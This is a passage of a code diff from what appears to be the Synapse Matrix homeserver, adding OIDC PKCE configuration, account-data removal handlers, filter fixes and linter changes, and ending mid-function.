--hash=sha256:46f39cab8bbf4a384ba7cb0bc8bae7b7062b6a11cfac1ca4bc144dea90d4a9f5 \
--hash=sha256:519e14e2c49fcf7616d6d2cfc5c70adae95682ae20f0395e9280db85e8d6c4df \
--hash=sha256:53dcb50fbdc3fb2c55431a9b30caeb2f7027fcd2aeb501459464f0214200a503 \
--hash=sha256:54614444887e0d3043557d9dbc697dbb16cfb5a35d672b7a0fcc1ed0cf1c600b \
--hash=sha256:575d8912dca808edd9acd6f7795199332696d3469665ef26163cd090fa1f8bfa \
--hash=sha256:5dd5a9c3091a0f414a963d427f920368e2b6a4c2f7527fdd82cde8ef0bc7a327 \
--hash=sha256:5f532a2ad4d174eb73494e7397988e22bf427f91acc8e6ebf5bb10597b49c493 \
--hash=sha256:60e7da3a3ad1812c128750fc1bc14a7ceeb8d29f77e0a2356a8fb2aa8925287d \
--hash=sha256:653d7fb2df65efefbcbf81ef5fe5e5be931f1ee4332c2893ca638c9b11a409c4 \
--hash=sha256:6663977496d616b618b6cfa43ec86e479ee62b942e1da76a2c3daa1c75933ef4 \
--hash=sha256:6abfb51a82e919e3933eb137e17c4ae9c0475a25508ea88993bb59faf82f3b35 \
--hash=sha256:6c6b1389ed66cdd174d040105123a5a1bc91d0aa7059c7261d20e583b6d8cbd2 \
--hash=sha256:6d9dfb9959a3b0039ee06c1a1a90dc23bac3b430842dcb97908ddde05870601c \
--hash=sha256:765cb54c0b8724a7c12c55146ae4647e0274a839fb6de7bcba841e04298e1011 \
--hash=sha256:7a21222644ab69ddd9967cfe6f2bb420b460dae4289c9d40ff9a4896e7c35c9a \
--hash=sha256:7ac7594397698f77bce84382929747130765f66406dc2cd8b4ab4da68ade4c6e \
--hash=sha256:7cfc287da09f9d2a7ec146ee4d72d6ea1342e770d975e49a8621bf54eaa8f30f \
--hash=sha256:847b114580c5cc9ebaf216dd8c8dbc6b00a3b7ab0131e173d7120e6deade1f57 \
--hash=sha256:8f127e7b028900421cad64f51f75c051b628db17fb00e099eb148761eed598c9 \
--hash=sha256:94cdff45173b1919350601f82d61365e792895e3c3a3443cf99819e6fbf717a5 \
--hash=sha256:9a3049a10261d7f2b6514d35bbb7a4dfc3ece4c4de14ef5876c4b7a23a0e566d \
--hash=sha256:a1c2d7780448eb93fbcc3789bf3916aa5720d942e37945f4056680317f1cd23e \
--hash=sha256:a2e0f87144fcbbe54297cae708c5e7f9da21a4646523456b00cc956bd4c65815 \
--hash=sha256:a4dfdae195335abb4e89cc9762b2edc524f3c6e80d647a9a81bf81e17e3fb6f0 \
--hash=sha256:a96e6e23f2b79433390273eaf8cc94fec9c6370842e577ab10dabdcc7ea0a66b \
--hash=sha256:aabdab8ec1e7ca7f1434d042bf8b1e92056245fb179790dc97ed040361f16bfd \
--hash=sha256:b222090c455d6d1a64e6b7bb5f4035c4dff479e22455c9eaa1bdd4c75b52c80c \
--hash=sha256:b52ff4f4e002f828ea6483faf4c4e8deea8d743cf801b74910243c58acc6eda3 \
--hash=sha256:b70756ec9417c34e097f987b4d8c510975216ad26ba6e57ccb53bc758f490dab \
--hash=sha256:b8c2f6eb0df979ee99433d8b3f6d193d9590f735cf12274c108bd954e30ca858 \
--hash=sha256:b9b752ab91e78234941e44abdecc07f1f0d8f51fb62941d32995b8161f68cfe5 \
--hash=sha256:ba6612b6548220ff5e9df85261bddc811a057b0b465a1226b39bfb8550616aee \
--hash=sha256:bd752c5ff1b4a870b7661234694f24b1d2b9076b8bf337321a814c612665f343 \
--hash=sha256:c3c4ed2ff6760e98d262e0cc9c9a7f7b8a9f61aa4d47c58835cdaf7b0b8811bb \
--hash=sha256:c5c1362c14aee73f50143d74389b2c158707b4abce2cb055b7ad37ce60738d47 \
--hash=sha256:cb362e3b0976dc994857391b776ddaa8c13c28a16f80ac6522c23d5257156bed \
--hash=sha256:d197df5489004db87d90b918033edbeee0bd6df3848a204bca3ff0a903bef837 \
--hash=sha256:d3b56206244dc8711f7e8b7d6cad4663917cd5b2d950799425076681e8766286 \
--hash=sha256:d5b2f8a31bd43e0f18172d8ac82347c8f37ef3e0b414431157718aa234991b28 \
--hash=sha256:d7081c084ceb58278dd3cf81f836bc818978c0ccc770cbbb202125ddabec6628 \
--hash=sha256:db74f5562c09953b2c5f8ec4b7dfd3f5421f31811e97d1dbc0a7c93d6e3a24df \
--hash=sha256:df41112ccce5d47770a0c13651479fbcd8793f34232a2dd9faeccb75eb5d0d0d \
--hash=sha256:e1339790c083c5a4de48f688b4841f18df839eb3c9584a770cbd818b33e26d5d \
--hash=sha256:e621b0246192d3b9cb1dc62c78cfa4c6f6d2ddc0ec207d43c0dedecb914f152a \
--hash=sha256:e8c5cf126889a4de385c02a2c3d3aba4b00f70234bfddae82a5eaa3ee6d5e3e6 \
--hash=sha256:e9d7747847c53a16a729b6ee5e737cf170f7a16611c143d95aa60a109a59c336 \
--hash=sha256:eaef5d2de3c7e9b21f1e762f289d17b726c2239a42b11e25446abf82b26ac132 \
--hash=sha256:ed3e4b4e1e6de75fdc16d3259098de7c6571b1a6cc863b1a49e7d3d53e036070 \
--hash=sha256:ef21af928e807f10bf4141cad4746eee692a0dd3ff56cfb25fce076ec3cc8abe \
--hash=sha256:f09598b416ba39a8f489c124447b007fe865f786a89dbfa48bb5cf395693132a \
--hash=sha256:f0caf4a5dcf610d96c3bd32932bfac8aee61c96e60481c2a0ea58da435e25acd \
--hash=sha256:f6e78171be3fb7941f9910ea15b4b14ec27725865a73c15277bc39f5ca4f8391 \
--hash=sha256:f715c32e774a60a337b2bb8ad9839b4abf75b267a0f18806f6f4f5f1688c4b5a \
--hash=sha256:fb5c1ad6bad98c57482236a21bf985ab0ef42bd51f7ad4e4538e89a997624e12
pkgutil-resolve-name==1.3.10 ; python_full_version >= "3.7.1" and python_version < "3.9" \
--hash=sha256:357d6c9e6a755653cfd78893817c0853af365dd51ec97f3d358a819373bbd174 \
--hash=sha256:ca27cc078d25c5ad71a9de0a7a330146c4e014c2462d9af19c6b828280649c5e
@ -541,43 +571,43 @@ pyasn1==0.4.8 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0"
pycparser==2.21 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9 \
--hash=sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206
pydantic==1.10.2 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:05e00dbebbe810b33c7a7362f231893183bcc4251f3f2ff991c31d5c08240c42 \
--hash=sha256:06094d18dd5e6f2bbf93efa54991c3240964bb663b87729ac340eb5014310624 \
--hash=sha256:0b959f4d8211fc964772b595ebb25f7652da3f22322c007b6fed26846a40685e \
--hash=sha256:19b3b9ccf97af2b7519c42032441a891a5e05c68368f40865a90eb88833c2559 \
--hash=sha256:1b6ee725bd6e83ec78b1aa32c5b1fa67a3a65badddde3976bca5fe4568f27709 \
--hash=sha256:1ee433e274268a4b0c8fde7ad9d58ecba12b069a033ecc4645bb6303c062d2e9 \
--hash=sha256:216f3bcbf19c726b1cc22b099dd409aa371f55c08800bcea4c44c8f74b73478d \
--hash=sha256:2d0567e60eb01bccda3a4df01df677adf6b437958d35c12a3ac3e0f078b0ee52 \
--hash=sha256:2e05aed07fa02231dbf03d0adb1be1d79cabb09025dd45aa094aa8b4e7b9dcda \
--hash=sha256:352aedb1d71b8b0736c6d56ad2bd34c6982720644b0624462059ab29bd6e5912 \
--hash=sha256:355639d9afc76bcb9b0c3000ddcd08472ae75318a6eb67a15866b87e2efa168c \
--hash=sha256:37c90345ec7dd2f1bcef82ce49b6235b40f282b94d3eec47e801baf864d15525 \
--hash=sha256:4b8795290deaae348c4eba0cebb196e1c6b98bdbe7f50b2d0d9a4a99716342fe \
--hash=sha256:5760e164b807a48a8f25f8aa1a6d857e6ce62e7ec83ea5d5c5a802eac81bad41 \
--hash=sha256:6eb843dcc411b6a2237a694f5e1d649fc66c6064d02b204a7e9d194dff81eb4b \
--hash=sha256:7b5ba54d026c2bd2cb769d3468885f23f43710f651688e91f5fb1edcf0ee9283 \
--hash=sha256:7c2abc4393dea97a4ccbb4ec7d8658d4e22c4765b7b9b9445588f16c71ad9965 \
--hash=sha256:81a7b66c3f499108b448f3f004801fcd7d7165fb4200acb03f1c2402da73ce4c \
--hash=sha256:91b8e218852ef6007c2b98cd861601c6a09f1aa32bbbb74fab5b1c33d4a1e410 \
--hash=sha256:9300fcbebf85f6339a02c6994b2eb3ff1b9c8c14f502058b5bf349d42447dcf5 \
--hash=sha256:9cabf4a7f05a776e7793e72793cd92cc865ea0e83a819f9ae4ecccb1b8aa6116 \
--hash=sha256:a1f5a63a6dfe19d719b1b6e6106561869d2efaca6167f84f5ab9347887d78b98 \
--hash=sha256:a4c805731c33a8db4b6ace45ce440c4ef5336e712508b4d9e1aafa617dc9907f \
--hash=sha256:ae544c47bec47a86bc7d350f965d8b15540e27e5aa4f55170ac6a75e5f73b644 \
--hash=sha256:b97890e56a694486f772d36efd2ba31612739bc6f3caeee50e9e7e3ebd2fdd13 \
--hash=sha256:bb6ad4489af1bac6955d38ebcb95079a836af31e4c4f74aba1ca05bb9f6027bd \
--hash=sha256:bedf309630209e78582ffacda64a21f96f3ed2e51fbf3962d4d488e503420254 \
--hash=sha256:c1ba1afb396148bbc70e9eaa8c06c1716fdddabaf86e7027c5988bae2a829ab6 \
--hash=sha256:c33602f93bfb67779f9c507e4d69451664524389546bacfe1bee13cae6dc7488 \
--hash=sha256:c4aac8e7103bf598373208f6299fa9a5cfd1fc571f2d40bf1dd1955a63d6eeb5 \
--hash=sha256:c6f981882aea41e021f72779ce2a4e87267458cc4d39ea990729e21ef18f0f8c \
--hash=sha256:cc78cc83110d2f275ec1970e7a831f4e371ee92405332ebfe9860a715f8336e1 \
--hash=sha256:d49f3db871575e0426b12e2f32fdb25e579dea16486a26e5a0474af87cb1ab0a \
--hash=sha256:dd3f9a40c16daf323cf913593083698caee97df2804aa36c4b3175d5ac1b92a2 \
--hash=sha256:e0bedafe4bc165ad0a56ac0bd7695df25c50f76961da29c050712596cf092d6d \
--hash=sha256:e9069e1b01525a96e6ff49e25876d90d5a563bc31c658289a8772ae186552236
pydantic==1.10.4 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:05a81b006be15655b2a1bae5faa4280cf7c81d0e09fcb49b342ebf826abe5a72 \
--hash=sha256:0b53e1d41e97063d51a02821b80538053ee4608b9a181c1005441f1673c55423 \
--hash=sha256:2b3ce5f16deb45c472dde1a0ee05619298c864a20cded09c4edd820e1454129f \
--hash=sha256:2e82a6d37a95e0b1b42b82ab340ada3963aea1317fd7f888bb6b9dfbf4fff57c \
--hash=sha256:301d626a59edbe5dfb48fcae245896379a450d04baeed50ef40d8199f2733b06 \
--hash=sha256:39f4a73e5342b25c2959529f07f026ef58147249f9b7431e1ba8414a36761f53 \
--hash=sha256:4948f264678c703f3877d1c8877c4e3b2e12e549c57795107f08cf70c6ec7774 \
--hash=sha256:4b05697738e7d2040696b0a66d9f0a10bec0efa1883ca75ee9e55baf511909d6 \
--hash=sha256:51bdeb10d2db0f288e71d49c9cefa609bca271720ecd0c58009bd7504a0c464c \
--hash=sha256:55b1625899acd33229c4352ce0ae54038529b412bd51c4915349b49ca575258f \
--hash=sha256:572066051eeac73d23f95ba9a71349c42a3e05999d0ee1572b7860235b850cc6 \
--hash=sha256:6a05a9db1ef5be0fe63e988f9617ca2551013f55000289c671f71ec16f4985e3 \
--hash=sha256:6dc1cc241440ed7ca9ab59d9929075445da6b7c94ced281b3dd4cfe6c8cff817 \
--hash=sha256:6e7124d6855b2780611d9f5e1e145e86667eaa3bd9459192c8dc1a097f5e9903 \
--hash=sha256:75d52162fe6b2b55964fbb0af2ee58e99791a3138588c482572bb6087953113a \
--hash=sha256:78cec42b95dbb500a1f7120bdf95c401f6abb616bbe8785ef09887306792e66e \
--hash=sha256:7feb6a2d401f4d6863050f58325b8d99c1e56f4512d98b11ac64ad1751dc647d \
--hash=sha256:8775d4ef5e7299a2f4699501077a0defdaac5b6c4321173bcb0f3c496fbadf85 \
--hash=sha256:887ca463c3bc47103c123bc06919c86720e80e1214aab79e9b779cda0ff92a00 \
--hash=sha256:9193d4f4ee8feca58bc56c8306bcb820f5c7905fd919e0750acdeeeef0615b28 \
--hash=sha256:983e720704431a6573d626b00662eb78a07148c9115129f9b4351091ec95ecc3 \
--hash=sha256:990406d226dea0e8f25f643b370224771878142155b879784ce89f633541a024 \
--hash=sha256:9cbdc268a62d9a98c56e2452d6c41c0263d64a2009aac69246486f01b4f594c4 \
--hash=sha256:a48f1953c4a1d9bd0b5167ac50da9a79f6072c63c4cef4cf2a3736994903583e \
--hash=sha256:a9a6747cac06c2beb466064dda999a13176b23535e4c496c9d48e6406f92d42d \
--hash=sha256:a9f2de23bec87ff306aef658384b02aa7c32389766af3c5dee9ce33e80222dfa \
--hash=sha256:b5635de53e6686fe7a44b5cf25fcc419a0d5e5c1a1efe73d49d48fe7586db854 \
--hash=sha256:b6f9d649892a6f54a39ed56b8dfd5e08b5f3be5f893da430bed76975f3735d15 \
--hash=sha256:b9a3859f24eb4e097502a3be1fb4b2abb79b6103dd9e2e0edb70613a4459a648 \
--hash=sha256:cd8702c5142afda03dc2b1ee6bc358b62b3735b2cce53fc77b31ca9f728e4bc8 \
--hash=sha256:d7b5a3821225f5c43496c324b0d6875fde910a1c2933d726a743ce328fbb2a8c \
--hash=sha256:d88c4c0e5c5dfd05092a4b271282ef0588e5f4aaf345778056fc5259ba098857 \
--hash=sha256:eb992a1ef739cc7b543576337bebfc62c0e6567434e522e97291b251a41dad7f \
--hash=sha256:f2f7eb6273dd12472d7f218e1fef6f7c7c2f00ac2e1ecde4db8824c457300416 \
--hash=sha256:fdf88ab63c3ee282c76d652fc86518aacb737ff35796023fae56a65ced1a5978 \
--hash=sha256:fdf8d759ef326962b4678d89e275ffc55b7ce59d917d9f72233762061fd04a2d
pymacaroons==0.13.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:1e6bba42a5f66c245adf38a5a4006a99dcc06a0703786ea636098667d42903b8 \
--hash=sha256:3e14dff6a262fdbf1a15e769ce635a8aea72e6f8f91e408f9a97166c53b91907
@ -592,9 +622,9 @@ pynacl==1.5.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0"
--hash=sha256:a36d4a9dda1f19ce6e03c9a784a2921a4b726b02e1c736600ca9c22029474394 \
--hash=sha256:a422368fc821589c228f4c49438a368831cb5bbc0eab5ebe1d7fac9dded6567b \
--hash=sha256:e46dae94e34b085175f8abb3b0aaa7da40767865ac82c928eeb9e57e1ea8a543
pyopenssl==22.1.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:7a83b7b272dd595222d672f5ce29aa030f1fb837630ef229f62e72e395ce8968 \
--hash=sha256:b28437c9773bb6c6958628cf9c3bebe585de661dba6f63df17111966363dd15e
pyopenssl==23.0.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:c1cc5f86bcacefc84dada7d31175cae1b1518d5f60d3d0bb595a67822a868a6f \
--hash=sha256:df5fc28af899e74e19fccb5510df423581047e10ab6f1f4ba1763ff5fde844c0
pyrsistent==0.18.1 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:0e3e1fcc45199df76053026a51cc59ab2ea3fc7c094c6627e93b7b44cdae2c8c \
--hash=sha256:1b34eedd6812bf4d33814fca1b66005805d3640ce53140ab8bbb1e2651b0d9bc \
@ -670,9 +700,9 @@ service-identity==21.1.0 ; python_full_version >= "3.7.1" and python_full_versio
setuptools-rust==1.5.2 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:8eb45851e34288f2296cd5ab9e924535ac1757318b730a13fe6836867843f206 \
--hash=sha256:d8daccb14dc0eae1b6b6eb3ecef79675bd37b4065369f79c35393dd5c55652c7
setuptools==65.3.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:2e24e0bec025f035a2e72cdd1961119f557d78ad331bb00ff82efb2ab8da8e82 \
--hash=sha256:7732871f4f7fa58fb6bdcaeadb0161b2bd046c85905dbaa066bdcbcc81953b57
setuptools==65.5.1 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:d0b9a8433464d5800cbe05094acf5c6d52a91bfac9b52bcfc4d41382be5d5d31 \
--hash=sha256:e197a19aa8ec9722928f2206f8de752def0e4c9fc6953527360d1c36d94ddb2f
signedjson==1.1.4 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:45569ec54241c65d2403fe3faf7169be5322547706a231e884ca2b427f23d228 \
--hash=sha256:cd91c56af53f169ef032c62e9c4a3292dc158866933318d0592e3462db3d6492

View File

@ -190,7 +190,7 @@ fi
extra_test_args=()
test_tags="synapse_blacklist,msc3787,msc3874"
test_tags="synapse_blacklist,msc3787,msc3874,msc3391"
# All environment variables starting with PASS_ will be shared.
# (The prefix is stripped off before reaching the container.)

View File

@ -1,9 +1,8 @@
#!/usr/bin/env bash
#
# Runs linting scripts over the local Synapse checkout
# isort - sorts import statements
# black - opinionated code formatter
# flake8 - lints and finds mistakes
# ruff - lints and finds mistakes
set -e
@ -105,6 +104,7 @@ set -x
isort "${files[@]}"
python3 -m black "${files[@]}"
./scripts-dev/config-lint.sh
flake8 "${files[@]}"
# --quiet suppresses the update check.
ruff --quiet "${files[@]}"
./scripts-dev/check_pydantic_models.py lint
mypy

View File

@ -14,6 +14,8 @@
# Stub for frozendict.
from __future__ import annotations
from typing import Any, Hashable, Iterable, Iterator, Mapping, Tuple, TypeVar, overload
_KT = TypeVar("_KT", bound=Hashable) # Key type.
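
These stub files all gain `from __future__ import annotations` (PEP 563), which postpones annotation evaluation so forward references no longer need quoting. A minimal illustration of the effect, using a hypothetical class rather than anything from the stubs:

from __future__ import annotations

class FrozenBox:
    # With postponed evaluation, the return annotation may name the class
    # before its definition is complete; without the future import it would
    # have to be written as the string "FrozenBox".
    def copy(self) -> FrozenBox: ...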

View File

@ -14,6 +14,8 @@
# Stub for PyICU.
from __future__ import annotations
class Locale:
@staticmethod
def getDefault() -> Locale: ...

View File

@ -2,6 +2,8 @@
# https://github.com/grantjenks/python-sortedcontainers/blob/eea42df1f7bad2792e8da77335ff888f04b9e5ae/sortedcontainers/sorteddict.pyi
# (from https://github.com/grantjenks/python-sortedcontainers/pull/107)
from __future__ import annotations
from typing import (
Any,
Callable,

View File

@ -2,6 +2,8 @@
# https://github.com/grantjenks/python-sortedcontainers/blob/a419ffbd2b1c935b09f11f0971696e537fd0c510/sortedcontainers/sortedlist.pyi
# (from https://github.com/grantjenks/python-sortedcontainers/pull/107)
from __future__ import annotations
from typing import (
Any,
Callable,

View File

@ -2,6 +2,8 @@
# https://github.com/grantjenks/python-sortedcontainers/blob/d0a225d7fd0fb4c54532b8798af3cbeebf97e2d5/sortedcontainers/sortedset.pyi
# (from https://github.com/grantjenks/python-sortedcontainers/pull/107)
from __future__ import annotations
from typing import (
AbstractSet,
Any,

View File

@ -1307,7 +1307,7 @@ def main() -> None:
sqlite_config = {
"name": "sqlite3",
"args": {
"database": args.sqlite_database,
"database": "file:{}?mode=rw".format(args.sqlite_database),
"cp_min": 1,
"cp_max": 1,
"check_same_thread": False,

View File

@ -351,13 +351,13 @@ class Filter:
self.not_rel_types = filter_json.get("org.matrix.msc3874.not_rel_types", [])
def filters_all_types(self) -> bool:
return "*" in self.not_types
return self.types == [] or "*" in self.not_types
def filters_all_senders(self) -> bool:
return "*" in self.not_senders
return self.senders == [] or "*" in self.not_senders
def filters_all_rooms(self) -> bool:
return "*" in self.not_rooms
return self.rooms == [] or "*" in self.not_rooms
def _check(self, event: FilterEvent) -> bool:
"""Checks whether the filter matches the given event.
@ -450,8 +450,8 @@ class Filter:
if any(map(match_func, disallowed_values)):
return False
# Other the event does not match at least one of the allowed values,
# reject it.
# Otherwise if the event does not match at least one of the allowed
# values, reject it.
allowed_values = getattr(self, name)
if allowed_values is not None:
if not any(map(match_func, allowed_values)):
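
The tightened `filters_all_*` semantics treat an explicitly empty allowlist the same as a `"*"` denylist: both can match nothing. Distilled into a standalone sketch (names and values are illustrative, not the Filter class itself):

from typing import List, Optional

def filters_all(allowed: Optional[List[str]], denied: List[str]) -> bool:
    # None means "no allowlist configured"; [] means "allow nothing".
    return allowed == [] or "*" in denied

assert filters_all([], [])        # empty allowlist rejects everything
assert filters_all(None, ["*"])   # wildcard denylist rejects everything
assert not filters_all(None, [])  # no constraints: nothing filtered out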

View File

@ -1,3 +1,5 @@
from __future__ import annotations
import argparse
from typing import (
Any,

View File

@ -16,7 +16,7 @@ import logging
import os
import re
import threading
from typing import Any, Callable, Dict, Optional
from typing import Any, Callable, Dict, Mapping, Optional
import attr
@ -94,7 +94,7 @@ def add_resizable_cache(
class CacheConfig(Config):
section = "caches"
_environ = os.environ
_environ: Mapping[str, str] = os.environ
event_cache_size: int
cache_factors: Dict[str, float]
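
Annotating `_environ` as `Mapping[str, str]`, rather than letting it be inferred as `os._Environ`, plausibly lets tests substitute a plain dict without upsetting mypy. A hedged sketch of such an override (the env var name is Synapse's, the value is illustrative):

# In a test, point the config at a canned "environment":
CacheConfig._environ = {"SYNAPSE_CACHE_FACTOR": "0.5"}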

View File

@ -136,3 +136,6 @@ class ExperimentalConfig(Config):
# Enable room version (and thus applicable push rules from MSC3931/3932)
version_id = RoomVersions.MSC1767v10.identifier
KNOWN_ROOM_VERSIONS[version_id] = RoomVersions.MSC1767v10
# MSC3391: Removing account data.
self.msc3391_enabled = experimental.get("msc3391_enabled", False)

View File

@ -117,6 +117,7 @@ OIDC_PROVIDER_CONFIG_SCHEMA = {
# to avoid importing authlib here.
"enum": ["client_secret_basic", "client_secret_post", "none"],
},
"pkce_method": {"type": "string", "enum": ["auto", "always", "never"]},
"scopes": {"type": "array", "items": {"type": "string"}},
"authorization_endpoint": {"type": "string"},
"token_endpoint": {"type": "string"},
@ -289,6 +290,7 @@ def _parse_oidc_config_dict(
client_secret=oidc_config.get("client_secret"),
client_secret_jwt_key=client_secret_jwt_key,
client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"),
pkce_method=oidc_config.get("pkce_method", "auto"),
scopes=oidc_config.get("scopes", ["openid"]),
authorization_endpoint=oidc_config.get("authorization_endpoint"),
token_endpoint=oidc_config.get("token_endpoint"),
@ -357,6 +359,10 @@ class OidcProviderConfig:
# 'none'.
client_auth_method: str
# Whether to enable PKCE when exchanging the authorization & token.
# Valid values are 'auto', 'always', and 'never'.
pkce_method: str
# list of scopes to request
scopes: Collection[str]
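
Tying the three `pkce_method` values to the provider-metadata handling shown later in this diff, the behaviour reduces to a small pure function (a sketch of the semantics, not the handler's actual shape):

def apply_pkce_method(metadata: dict, pkce_method: str) -> None:
    # 'always' forces S256, 'never' strips PKCE support, and 'auto'
    # leaves whatever the provider's discovery document advertised.
    if pkce_method == "always":
        metadata["code_challenge_methods_supported"] = ["S256"]
    elif pkce_method == "never":
        metadata.pop("code_challenge_methods_supported", None)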

View File

@ -17,10 +17,12 @@ import random
from typing import TYPE_CHECKING, Awaitable, Callable, Collection, List, Optional, Tuple
from synapse.replication.http.account_data import (
ReplicationAddRoomAccountDataRestServlet,
ReplicationAddTagRestServlet,
ReplicationAddUserAccountDataRestServlet,
ReplicationRemoveRoomAccountDataRestServlet,
ReplicationRemoveTagRestServlet,
ReplicationRoomAccountDataRestServlet,
ReplicationUserAccountDataRestServlet,
ReplicationRemoveUserAccountDataRestServlet,
)
from synapse.streams import EventSource
from synapse.types import JsonDict, StreamKeyType, UserID
@ -41,8 +43,18 @@ class AccountDataHandler:
self._instance_name = hs.get_instance_name()
self._notifier = hs.get_notifier()
self._user_data_client = ReplicationUserAccountDataRestServlet.make_client(hs)
self._room_data_client = ReplicationRoomAccountDataRestServlet.make_client(hs)
self._add_user_data_client = (
ReplicationAddUserAccountDataRestServlet.make_client(hs)
)
self._remove_user_data_client = (
ReplicationRemoveUserAccountDataRestServlet.make_client(hs)
)
self._add_room_data_client = (
ReplicationAddRoomAccountDataRestServlet.make_client(hs)
)
self._remove_room_data_client = (
ReplicationRemoveRoomAccountDataRestServlet.make_client(hs)
)
self._add_tag_client = ReplicationAddTagRestServlet.make_client(hs)
self._remove_tag_client = ReplicationRemoveTagRestServlet.make_client(hs)
self._account_data_writers = hs.config.worker.writers.account_data
@ -112,7 +124,7 @@ class AccountDataHandler:
return max_stream_id
else:
response = await self._room_data_client(
response = await self._add_room_data_client(
instance_name=random.choice(self._account_data_writers),
user_id=user_id,
room_id=room_id,
@ -121,15 +133,59 @@ class AccountDataHandler:
)
return response["max_stream_id"]
async def remove_account_data_for_room(
self, user_id: str, room_id: str, account_data_type: str
) -> Optional[int]:
"""
Deletes the room account data for the given user and account data type.
"Deleting" account data merely means setting the content of the account data
to an empty JSON object: {}.
Args:
user_id: The user ID to remove room account data for.
room_id: The room ID to target.
account_data_type: The account data type to remove.
Returns:
The maximum stream ID, or None if the room account data item did not exist.
"""
if self._instance_name in self._account_data_writers:
max_stream_id = await self._store.remove_account_data_for_room(
user_id, room_id, account_data_type
)
if max_stream_id is None:
# The referenced account data did not exist, so no delete occurred.
return None
self._notifier.on_new_event(
StreamKeyType.ACCOUNT_DATA, max_stream_id, users=[user_id]
)
# Notify Synapse modules that the content of the type has changed to an
# empty dictionary.
await self._notify_modules(user_id, room_id, account_data_type, {})
return max_stream_id
else:
response = await self._remove_room_data_client(
instance_name=random.choice(self._account_data_writers),
user_id=user_id,
room_id=room_id,
account_data_type=account_data_type,
content={},
)
return response["max_stream_id"]
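
Note the return contract: `None` signals there was nothing to delete, while an integer is the stream position of the tombstone write. A hypothetical call site (the account data type is illustrative):

# Inside an async function:
max_stream_id = await account_data_handler.remove_account_data_for_room(
    "@alice:example.com", "!room:example.com", "m.fully_read"
)
if max_stream_id is None:
    pass  # that type was never set for this room, so nothing changed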
async def add_account_data_for_user(
self, user_id: str, account_data_type: str, content: JsonDict
) -> int:
"""Add some global account_data for a user.
Args:
user_id: The user to add a tag for.
user_id: The user to add some account data for.
account_data_type: The type of account_data to add.
content: A json object to associate with the tag.
content: The content json dictionary.
Returns:
The maximum stream ID.
@ -148,7 +204,7 @@ class AccountDataHandler:
return max_stream_id
else:
response = await self._user_data_client(
response = await self._add_user_data_client(
instance_name=random.choice(self._account_data_writers),
user_id=user_id,
account_data_type=account_data_type,
@ -156,6 +212,45 @@ class AccountDataHandler:
)
return response["max_stream_id"]
async def remove_account_data_for_user(
self, user_id: str, account_data_type: str
) -> Optional[int]:
"""Removes a piece of global account_data for a user.
Args:
user_id: The user to remove account data for.
account_data_type: The type of account_data to remove.
Returns:
The maximum stream ID, or None if the room account data item did not exist.
"""
if self._instance_name in self._account_data_writers:
max_stream_id = await self._store.remove_account_data_for_user(
user_id, account_data_type
)
if max_stream_id is None:
# The referenced account data did not exist, so no delete occurred.
return None
self._notifier.on_new_event(
StreamKeyType.ACCOUNT_DATA, max_stream_id, users=[user_id]
)
# Notify Synapse modules that the content of the type has changed to an
# empty dictionary.
await self._notify_modules(user_id, None, account_data_type, {})
return max_stream_id
else:
response = await self._remove_user_data_client(
instance_name=random.choice(self._account_data_writers),
user_id=user_id,
account_data_type=account_data_type,
content={},
)
return response["max_stream_id"]
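
Both remove methods follow Synapse's usual writer-dispatch shape: a designated account-data writer touches the database and notifier directly, while every other instance relays over replication HTTP to a randomly chosen writer. Reduced to its skeleton (a sketch; `_store_write` and `_replication_client` are hypothetical stand-ins):

import random

async def dispatch_write(handler, user_id: str, data_type: str) -> int:
    # A designated writer touches the database directly ...
    if handler._instance_name in handler._account_data_writers:
        return await handler._store_write(user_id, data_type)
    # ... everyone else relays to a randomly chosen writer over replication.
    return await handler._replication_client(
        instance_name=random.choice(handler._account_data_writers),
        user_id=user_id,
        data_type=data_type,
    )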
async def add_tag_to_room(
self, user_id: str, room_id: str, tag: str, content: JsonDict
) -> int:

View File

@ -2031,7 +2031,7 @@ class PasswordAuthProvider:
self.is_3pid_allowed_callbacks: List[IS_3PID_ALLOWED_CALLBACK] = []
# Mapping from login type to login parameters
self._supported_login_types: Dict[str, Iterable[str]] = {}
self._supported_login_types: Dict[str, Tuple[str, ...]] = {}
# Mapping from login type to auth checker callbacks
self.auth_checker_callbacks: Dict[str, List[CHECK_AUTH_CALLBACK]] = {}

View File

@ -14,6 +14,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from http import HTTPStatus
from typing import (
TYPE_CHECKING,
Any,
@ -33,6 +34,7 @@ from synapse.api.errors import (
Codes,
FederationDeniedError,
HttpResponseException,
InvalidAPICallError,
RequestSendFailed,
SynapseError,
)
@ -45,6 +47,7 @@ from synapse.types import (
JsonDict,
StreamKeyType,
StreamToken,
UserID,
get_domain_from_id,
get_verify_key_from_cross_signing_key,
)
@ -893,12 +896,47 @@ class DeviceListWorkerUpdater:
def __init__(self, hs: "HomeServer"):
from synapse.replication.http.devices import (
ReplicationMultiUserDevicesResyncRestServlet,
ReplicationUserDevicesResyncRestServlet,
)
self._user_device_resync_client = (
ReplicationUserDevicesResyncRestServlet.make_client(hs)
)
self._multi_user_device_resync_client = (
ReplicationMultiUserDevicesResyncRestServlet.make_client(hs)
)
async def multi_user_device_resync(
self, user_ids: List[str], mark_failed_as_stale: bool = True
) -> Dict[str, Optional[JsonDict]]:
"""
Like `user_device_resync` but operates on multiple users **from the same origin**
at once.
Returns:
Dict from User ID to the same Dict as `user_device_resync`.
"""
# mark_failed_as_stale is not sent. Ensure this doesn't break expectations.
assert mark_failed_as_stale
if not user_ids:
